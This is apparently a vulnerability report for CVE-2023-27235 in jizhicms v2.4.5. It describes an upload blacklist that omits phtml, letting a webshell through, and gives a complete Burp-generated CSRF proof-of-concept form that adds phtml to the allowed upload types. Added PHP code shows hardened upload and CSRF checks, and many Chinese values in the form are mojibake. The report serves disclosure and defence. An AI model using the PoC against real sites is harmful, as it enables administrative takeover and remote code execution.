CVE-2023-27235: jizhicms v2.4.5 has a file upload vulnerability and a CSRF vulnerability · Issue #85 · Cherry-toto/jizhicms

An arbitrary file upload vulnerability in the \admin\c\CommonController.php component of Jizhicms v2.4.5 allows attackers to execute arbitrary code via a crafted phtml file.


The file upload vulnerability is in:
\app\admin\c\CommonController.php
The upload handler checks the suffix of uploaded files against both a blacklist and a whitelist, but the blacklist does not include the phtml suffix, so the suffix check can be bypassed.
A user who is logged in to the admin backend can add phtml to the whitelist suffixes and then upload a one-line webshell (一句话木马) with the phtml suffix.

The file is uploaded successfully and the response returns the upload path.

Repair method: add phtml to the blacklist.
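
As an added illustration (this is not jizhicms code, and all function names in it are assumptions), the following PHP contrasts a deny-list that omits phtml, which is the defect the report describes, with an allow-list check backed by a hard-coded deny-list that an administrator-editable whitelist cannot override. It also stores the file under a server-generated name so the original filename never reaches disk.

```php
<?php
// Added example, not jizhicms code. Function names are hypothetical.

// Weak approach mirroring the reported flaw: a deny-list that forgets
// "phtml" lets a PHP-handled extension through.
function is_allowed_by_blacklist(string $filename): bool {
    $blocked = ['php', 'php3', 'php4', 'php5', 'phps'];   // no "phtml"
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return !in_array($ext, $blocked, true);
}

// Hardened approach: extensions that a PHP web server may execute are
// refused unconditionally, even if an administrator (or a CSRF'd admin
// session) has written them into the configured whitelist.
const NEVER_ALLOWED = ['php', 'php3', 'php4', 'php5', 'php7', 'phps',
                       'phtml', 'phar', 'htaccess'];

function is_allowed_upload(string $filename, array $configuredWhitelist): bool {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    if ($ext === '') {
        return false;                       // no extension at all
    }
    if (in_array($ext, NEVER_ALLOWED, true)) {
        return false;                       // hard-coded deny-list wins
    }
    $whitelist = array_map('strtolower', $configuredWhitelist);
    return in_array($ext, $whitelist, true); // then the admin allow-list
}

// Store under a random name with the validated extension, so a name such
// as "photo.php.jpg" can never be written to disk as given.
function stored_name(string $filename): string {
    $ext = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs: the whitelist already contains "phtml", as it
// would after the settings form in the report has been submitted.
$whitelist = ['pdf', 'jpg', 'jpeg', 'png', 'zip', 'phtml'];
foreach (['report.pdf', 'page.phtml', 'Page.PHTML', 'image.png', 'noext'] as $name) {
    printf("%-12s blacklist=%-5s allowlist=%-5s\n", $name,
        is_allowed_by_blacklist($name) ? 'allow' : 'deny',
        is_allowed_upload($name, $whitelist) ? 'allow' : 'deny');
}
echo "stored as: ", stored_name('image.png'), "\n";
```

The extension check is only one layer: Debian-style Apache PHP configuration matches `.ph(ar|p|tml)` in its FilesMatch handler, so phtml is executable wherever php is, and the upload directory itself should additionally have script execution disabled so that a missed extension or a double-extension name cannot be served as code.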

The CSRF vulnerability:
Once an administrator is logged in, opening the following page adds phtml to the whitelist; the other configuration items can be modified the same way.

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost:63342/jizhicms/index.php/admins/Sys/index.html" method="POST">
      <input type="hidden" name="web&#95;name" value="�&#158;&#129;�&#135;&#180;CMS�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;keyword" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;&#44;cms&#44;�&#188;&#128;�&#144;cms&#44;�&#133;&#141;�&#180;&#185;cms&#44;cms�&#179;&#187;�&#187;&#159;&#44;phpcms&#44;�&#133;&#141;�&#180;&#185;�&#188;&#129;�&#184;&#154;�&#187;��&#171;&#153;&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#188;&#129;�&#184;&#154;cms&#44;jizhicms&#44;�&#158;&#129;�&#135;&#180;cms&#44;�&#187;��&#171;&#153;cms&#44;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;&#44;�&#158;&#129;�&#135;&#180;�&#141;&#154;�&#174;&#162;&#44;�&#158;&#129;�&#135;&#180;blog&#44;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="web&#95;desc" value="�&#158;&#129;�&#135;&#180;CMS�&#152;&#175;�&#188;&#128;�&#144;�&#133;&#141;�&#180;&#185;�&#154;&#132;PHPCMS�&#189;&#145;�&#171;&#153;�&#134;&#133;�&#174;&#185;�&#174;&#161;�&#144;&#134;�&#179;&#187;�&#187;&#159;�&#188;&#140;�&#151;&#160;�&#149;&#134;�&#184;&#154;�&#142;&#136;�&#157;&#131;�&#188;&#140;�&#174;&#128;�&#141;&#149;�&#152;&#147;�&#148;&#168;�&#188;&#140;�&#143;&#144;�&#190;&#155;�&#184;&#176;�&#175;&#140;�&#154;&#132;�&#143;&#146;�&#187;&#182;�&#188;&#140;�&#184;&#174;�&#130;&#168;�&#174;&#158;�&#142;&#176;�&#155;&#182;�&#159;��&#161;&#128;�&#144;&#173;�&#187;��&#184;&#141;�&#144;&#140;�&#177;&#187;�&#158;&#139;�&#189;&#145;�&#171;&#153;�&#188;&#136;�&#188;&#129;�&#184;&#154;�&#171;&#153;�&#188;&#140;�&#151;&#168;�&#136;&#183;�&#171;&#153;�&#188;&#140;�&#184;�人�&#141;&#154;�&#174;&#162;�&#171;&#153;�&#173;&#137;�&#188;&#137;�&#188;&#140;�&#152;&#175;�&#130;&#168;�&#187;��&#171;&#153;�&#154;&#132;�&#165;&#189;�&#184;&#174;�&#137;&#139;�&#128;&#130;�&#158;&#129;�&#128;&#159;�&#187;��&#171;&#153;�&#188;&#140;�&#176;&#177;�&#128;&#137;�&#158;&#129;�&#135;&#180;CMS�&#128;&#130;" />
      <input type="hidden" name="web&#95;copyright" value="&#64;2020&#45;2099" />
      <input type="hidden" name="web&#95;beian" value="�&#134;&#128;ICP�&#164;&#135;88888�&#143;&#183;" />
      <input type="hidden" name="web&#95;tel" value="0666&#45;8888888" />
      <input type="hidden" name="web&#95;tel&#95;400" value="400&#45;0000&#45;000" />
      <input type="hidden" name="web&#95;qq" value="12345678" />
      <input type="hidden" name="web&#95;email" value="123456&#64;qq&#46;com" />
      <input type="hidden" name="web&#95;address" value="�&#178;&#179;�&#140;&#151;�&#156;&#129;�&#187;&#138;�&#157;&#138;�&#184;&#130;�&#185;&#191;�&#152;&#179;�&#140;�xxx�&#164;&#167;�&#142;&#166;xx�&#165;&#188;001�&#143;&#183;" />
      <input type="hidden" name="web&#95;logo" value="&#47;static&#47;cms&#47;static&#47;images&#47;logo&#46;png" />
      <input type="hidden" name="file" value="" />
      <input type="hidden" name="domain" value="" />
      <input type="hidden" name="mingan" value="" />
      <input type="hidden" name="closeweb" value="0" />
      <input type="hidden" name="closetip" value="�&#138;&#177;�&#173;&#137;�&#188;&#129;�&#175;&#165;�&#171;&#153;�&#130;&#185;�&#183;&#178;�&#187;&#143;�&#162;&#171;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#129;&#156;�&#173;&#162;�&#191;&#144;�&#161;&#140;�&#188;&#140;�&#175;&#183;�&#129;&#148;�&#179;&#187;�&#174;&#161;�&#144;&#134;�&#145;&#152;�&#134;�&#167;&#163;�&#175;&#166;�&#131;&#133;�&#188;&#129;" />
      <input type="hidden" name="web&#95;phone" value="0" />
      <input type="hidden" name="web&#95;weixin" value="" />
      <input type="hidden" name="pc&#95;template" value="cms" />
      <input type="hidden" name="wap&#95;template" value="cms" />
      <input type="hidden" name="weixin&#95;template" value="cms" />
      <input type="hidden" name="iswap" value="1" />
      <input type="hidden" name="isopenhomeupload" value="1" />
      <input type="hidden" name="isopenhomepower" value="0" />
      <input type="hidden" name="cache&#95;time" value="0" />
      <input type="hidden" name="fileSize" value="0" />
      <input type="hidden" name="fileType" value="pdf&#124;jpg&#124;jpeg&#124;png&#124;zip&#124;rar&#124;gzip&#124;doc&#124;docx&#124;xlsx&#124;phtml" />
      <input type="hidden" name="ueditor&#95;config" value="&quot;fullscreen&quot;&#44;&#32;&quot;source&quot;&#44;&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&quot;bold&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;underline&quot;&#44;&#32;&quot;fontborder&quot;&#44;&#32;&quot;strikethrough&quot;&#44;&#32;&quot;super&quot;&#44;&#32;&quot;removeformat&quot;&#44;&#32;&quot;formatmatch&quot;&#44;&#32;&quot;autotypeset&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;pasteplain&quot;&#44;&quot;forecolor&quot;&#44;&#32;&quot;backcolor&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&#32;&quot;selectall&quot;&#44;&#32;&quot;cleardoc&quot;&#44;&quot;rowspacingtop&quot;&#44;&#32;&quot;rowspacingbottom&quot;&#44;&#32;&quot;lineheight&quot;&#44;&quot;customstyle&quot;&#44;&#32;&quot;paragraph&quot;&#44;&#32;&quot;fontfamily&quot;&#44;&#32;&quot;fontsize&quot;&#44;&quot;directionalityltr&quot;&#44;&#32;&quot;directionalityrtl&quot;&#44;&#32;&quot;indent&quot;&#44;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&#32;&quot;justifyjustify&quot;&#44;&quot;touppercase&quot;&#44;&#32;&quot;tolowercase&quot;&#44;&quot;link&quot;&#44;&#32;&quot;unlink&quot;&#44;&#32;&quot;anchor&quot;&#44;&#32;&quot;imagenone&quot;&#44;&#32;&quot;imageleft&quot;&#44;&#32;&quot;imageright&quot;&#44;&#32;&quot;imagecenter&quot;&#44;&quot;simpleupload&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;emotion&quot;&#44;&#32;&quot;scrawl&quot;&#44;&#32;&quot;insertvideo&quot;&#44;&#32;&quot;music&quot;&#44;&#32;&quot;attachment&quot;&#44;&#32;&quot;map&quot;&#44;&#32;&quot;gmap&quot;&#44;&#32;&quot;insertframe&quot;&#44;&#32;&quot;insertcode&quot;&#44;&#32;&quot;webapp&quot;&#44;&#32;&quot;pagebreak&quot;&#44;&quot;template&quot;&#44;&#32;&quot;background&quot;&#44;&quot;horizontal&quot;&#44;&#32;&quot;date&quot;&#44;&#32;&quot;time&quot;&#44;&#32;&quot;spechars&quot;&#44;&#32;&quot;snapscreen&quot;&#4
4;&#32;&quot;wordimage&quot;&#44;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&#32;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;charts&quot;&#44;&quot;print&quot;&#44;&#32;&quot;preview&quot;&#44;&#32;&quot;searchreplace&quot;&#44;&#32;&quot;help&quot;&#44;&#32;&quot;drafts&quot;" />
      <input type="hidden" name="ueditor&#95;user&#95;config" value="&quot;undo&quot;&#44;&#32;&quot;redo&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;paragraph&quot;&#44;&quot;bold&quot;&#44;&quot;forecolor&quot;&#44;&quot;fontfamily&quot;&#44;&quot;fontsize&quot;&#44;&#32;&quot;italic&quot;&#44;&#32;&quot;blockquote&quot;&#44;&#32;&quot;insertparagraph&quot;&#44;&#32;&quot;justifyleft&quot;&#44;&#32;&quot;justifycenter&quot;&#44;&#32;&quot;justifyright&quot;&#44;&quot;justifyjustify&quot;&#44;&quot;&#124;&quot;&#44;&quot;indent&quot;&#44;&#32;&quot;insertorderedlist&quot;&#44;&#32;&quot;insertunorderedlist&quot;&#44;&quot;&#124;&quot;&#44;&#32;&quot;insertimage&quot;&#44;&#32;&quot;inserttable&quot;&#44;&#32;&quot;deletetable&quot;&#44;&#32;&quot;insertparagraphbeforetable&quot;&#44;&#32;&quot;insertrow&quot;&#44;&#32;&quot;deleterow&quot;&#44;&#32;&quot;insertcol&quot;&#44;&#32;&quot;deletecol&quot;&#44;&quot;mergecells&quot;&#44;&#32;&quot;mergeright&quot;&#44;&#32;&quot;mergedown&quot;&#44;&#32;&quot;splittocells&quot;&#44;&#32;&quot;splittorows&quot;&#44;&#32;&quot;splittocols&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;drafts&quot;&#44;&#32;&quot;&#124;&quot;&#44;&quot;fullscreen&quot;" />
      <input type="hidden" name="classtypemaxlevel" value="0" />
      <input type="hidden" name="onlyuserupload" value="1" />
      <input type="hidden" name="imagequlity" value="75" />
      <input type="hidden" name="ispngcompress" value="0" />
      <input type="hidden" name="admintpl" value="default" />
      <input type="hidden" name="islevelurl" value="0" />
      <input type="hidden" name="iscachepage" value="1" />
      <input type="hidden" name="isautohtml" value="0" />
      <input type="hidden" name="pc&#95;html" value="&#47;" />
      <input type="hidden" name="mobile&#95;html" value="m" />
      <input type="hidden" name="autocheckmessage" value="0" />
      <input type="hidden" name="autocheckcomment" value="1" />
      <input type="hidden" name="iswatermark" value="0" />
      <input type="hidden" name="watermark&#95;file" value="" />
      <input type="hidden" name="watermark&#95;t" value="9" />
      <input type="hidden" name="watermark&#95;tm" value="0" />
      <input type="hidden" name="admin&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="home&#95;save&#95;path" value="static&#47;upload&#47;&#123;yyyy&#125;&#47;&#123;mm&#125;&#47;&#123;dd&#125;" />
      <input type="hidden" name="isajax" value="0" />
      <input type="hidden" name="isregister" value="1" />
      <input type="hidden" name="onlyinvite" value="0" />
      <input type="hidden" name="release&#95;table" value="article&#124;product" />
      <input type="hidden" name="closehomevercode" value="0" />
      <input type="hidden" name="closeadminvercode" value="0" />
      <input type="hidden" name="tag&#95;table" value="article&#124;product" />
      <input type="hidden" name="isdebug" value="1" />
      <input type="hidden" name="closesession" value="0" />
      <input type="hidden" name="messageyzm" value="1" />
      <input type="hidden" name="homerelease" value="1" />
      <input type="hidden" name="hideclasspath" value="0" />
      <input type="hidden" name="hidetitleonliy" value="article&#45;title&#124;product&#45;title" />
      <input type="hidden" name="cachefilenum" value="100" />
      <input type="hidden" name="search&#95;table" value="article&#124;product" />
      <input type="hidden" name="search&#95;words" value="title" />
      <input type="hidden" name="search&#95;words&#95;muti" value="title" />
      <input type="hidden" name="search&#95;table&#95;muti" value="article&#124;product" />
      <input type="hidden" name="search&#95;fields&#95;muti" value="id&#44;tid&#44;litpic&#44;title&#44;tags&#44;keywords&#44;molds&#44;htmlurl&#44;description&#44;addtime&#44;userid&#44;member&#95;id&#44;hits&#44;ownurl&#44;target" />
      <input type="hidden" name="email&#95;server" value="smtp&#46;163&#46;com" />
      <input type="hidden" name="email&#95;port" value="465" />
      <input type="hidden" name="shou&#95;email" value="" />
      <input type="hidden" name="send&#95;email" value="" />
      <input type="hidden" name="send&#95;pass" value="" />
      <input type="hidden" name="send&#95;name" value="�&#158;&#129;�&#135;&#180;�&#187;��&#171;&#153;�&#179;&#187;�&#187;&#159;" />
      <input type="hidden" name="tj&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#187;&#143;�&#148;&#182;�&#136;&#176;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#129;�&#175;&#183;�&#149;&#153;�&#132;&#143;�&#130;&#168;�&#154;&#132;�&#148;��&#173;&#144;�&#130;&#174;�&#187;&#182;�&#187;&#165;�&#142;&#183;�&#190;&#151;�&#156;&#128;�&#150;&#176;�&#182;&#136;�&#129;&#175;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#188;&#129;" />
      <input type="hidden" name="send&#95;msg" value="�&#176;&#138;�&#149;&#172;�&#154;&#132;&#123;xxx&#125;�&#188;&#140;�&#136;&#145;�&#187;&#172;�&#183;&#178;�&#161;&#174;�&#174;&#164;�&#134;�&#130;&#168;�&#154;&#132;�&#174;&#162;�&#141;&#149;�&#188;&#140;�&#175;&#183;�&#142;3�&#151;&#165;�&#134;&#133;�&#177;&#135;�&#172;&#190;�&#188;&#140;�&#128;&#190;�&#156;&#159;�&#129;&#149;�&#184;&#141;�&#191;&#157;�&#149;&#153;�&#188;&#140;�&#184;&#141;�&#190;&#191;�&#175;&#183;�&#167;&#129;�&#176;&#133;�&#128;&#130;�&#177;&#135;�&#172;&#190;�&#174;&#140;�&#136;&#144;�&#144;&#142;�&#188;&#140;�&#131;&#166;�&#175;&#183;�&#145;&#138;�&#159;&#165;�&#174;&#162;�&#156;&#141;人�&#145;&#152;�&#130;&#168;�&#154;&#132;�&#164;�&#152;&#147;�&#180;&#166;�&#143;&#183;�&#144;&#142;�&#148;�&#189;&#141;�&#188;&#140;�&#141;&#179;�&#174;&#140;�&#136;&#144;�&#184;&#139;�&#141;&#149;�&#137;&#139;�&#187;&#173;�&#188;&#140;�&#176;&#162;�&#176;&#162;�&#130;&#168;�&#128;&#130;" />
      <input type="hidden" name="yunfei" value="0&#46;00" />
      <input type="hidden" name="overtime" value="4" />
      <input type="hidden" name="isopenemail" value="1" />
      <input type="hidden" name="paytype" value="0" />
      <input type="hidden" name="alipay&#95;partner" value="" />
      <input type="hidden" name="alipay&#95;key" value="" />
      <input type="hidden" name="alipay&#95;private&#95;key" value="" />
      <input type="hidden" name="alipay&#95;public&#95;key" value="" />
      <input type="hidden" name="wx&#95;mchid" value="" />
      <input type="hidden" name="wx&#95;key" value="" />
      <input type="hidden" name="wx&#95;appid" value="" />
      <input type="hidden" name="wx&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;client&#95;cert" value="" />
      <input type="hidden" name="wx&#95;client&#95;key" value="" />
      <input type="hidden" name="wx&#95;token" value="" />
      <input type="hidden" name="money&#95;exchange" value="1" />
      <input type="hidden" name="jifen&#95;exchange" value="100" />
      <input type="hidden" name="isopenjifen" value="1" />
      <input type="hidden" name="isopenqianbao" value="1" />
      <input type="hidden" name="isopenweixin" value="1" />
      <input type="hidden" name="isopenzfb" value="1" />
      <input type="hidden" name="isopendmf" value="1" />
      <input type="hidden" name="wx&#95;login&#95;appid" value="" />
      <input type="hidden" name="wx&#95;login&#95;appsecret" value="" />
      <input type="hidden" name="wx&#95;login&#95;token" value="" />
      <input type="hidden" name="huanying" value="�&#172;&#162;�&#191;&#142;�&#133;&#179;�&#179;&#168;�&#133;&#172;�&#188;&#151;�&#143;&#183;&#126;" />
      <input type="hidden" name="login&#95;award" value="1" />
      <input type="hidden" name="login&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award&#95;open" value="1" />
      <input type="hidden" name="release&#95;award" value="1" />
      <input type="hidden" name="release&#95;max&#95;award" value="0" />
      <input type="hidden" name="collect&#95;award&#95;open" value="1" />
      <input type="hidden" name="collect&#95;award" value="1" />
      <input type="hidden" name="collect&#95;max&#95;award" value="1000" />
      <input type="hidden" name="likes&#95;award&#95;open" value="1" />
      <input type="hidden" name="likes&#95;award" value="1" />
      <input type="hidden" name="likes&#95;max&#95;award" value="1000" />
      <input type="hidden" name="comment&#95;award&#95;open" value="1" />
      <input type="hidden" name="comment&#95;award" value="1" />
      <input type="hidden" name="comment&#95;max&#95;award" value="1000" />
      <input type="hidden" name="follow&#95;award&#95;open" value="1" />
      <input type="hidden" name="follow&#95;award" value="1" />
      <input type="hidden" name="follow&#95;max&#95;award" value="1000" />
      <input type="hidden" name="invite&#95;award&#95;open" value="0" />
      <input type="hidden" name="invite&#95;type" value="jifen" />
      <input type="hidden" name="invite&#95;award" value="0" />
      <input type="hidden" name="custom&#95;type" value="0" />
      <input type="hidden" name="custom&#95;title" value="" />
      <input type="hidden" name="custom&#95;fields" value="" />
      <input type="hidden" name="custom&#95;ctype" value="1" />
      <input type="hidden" name="custom&#95;tips" value="" />
      <input type="hidden" name="custom&#95;config" value="" />
      <input type="hidden" name="custom&#95;new&#95;title" value="" />
      <input type="hidden" name="custom&#95;new&#95;fields" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
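
The settings form the PoC above replays carries no anti-forgery token, which is why a cross-site page can submit it with the administrator's cookies. As an added example (not jizhicms code; the session is passed in as an array so the demo runs from the command line, and every name below is hypothetical), this PHP shows a synchronizer-token check combined with an Origin/Referer check, and exercises it with one constructed legitimate request and one constructed request shaped like the PoC's submission.

```php
<?php
// Added example, not jizhicms code. In a real application the $session
// array is $_SESSION; here it is a plain array so the script runs from CLI.

// Mint one unguessable token per session and reuse it for every form.
function csrf_token(array &$session): string {
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32)); // 256 bits
    }
    return $session['csrf_token'];
}

// The hidden field each state-changing form must carry.
function csrf_field(array &$session): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Accept the request only if (a) the submitted token equals the session
// token (constant-time compare) and (b) the browser-supplied Origin, or
// Referer as a fallback, names this site. A form hosted on another origin
// cannot read the token and fails both checks.
function csrf_request_is_valid(array $post, array $server, array $session, string $site): bool {
    $stored = $session['csrf_token'] ?? '';
    $sent   = $post['csrf_token'] ?? '';
    if ($stored === '' || !is_string($sent) || !hash_equals($stored, $sent)) {
        return false;
    }
    $source = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    return parse_url($source, PHP_URL_HOST) === $site;
}

// Constructed requests. The site host matches the PoC's target URL.
$session = [];
$token   = csrf_token($session);
$site    = 'localhost';

$legit = [   // form rendered by the application itself, token included
    'post'   => ['fileType' => 'pdf|jpg|png', 'csrf_token' => $token],
    'server' => ['HTTP_ORIGIN' => 'http://localhost:63342'],
];
$forged = [  // shape of the PoC submission: no token, foreign Origin
    'post'   => ['fileType' => 'pdf|jpg|png|phtml'],
    'server' => ['HTTP_ORIGIN' => 'http://attacker.example'],
];

echo csrf_field($session), "\n";
foreach (['legit' => $legit, 'forged' => $forged] as $label => $req) {
    $ok = csrf_request_is_valid($req['post'], $req['server'], $session, $site);
    echo "$label request: ", $ok ? 'accepted' : 'rejected', "\n";
}
```

Setting the session cookie with `SameSite=Lax` (PHP 7.3+: `session_set_cookie_params(['samesite' => 'Lax'])`) adds a browser-enforced layer, since a top-level cross-site POST such as the PoC's form then arrives without the admin cookie at all; it complements the token rather than replacing it.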
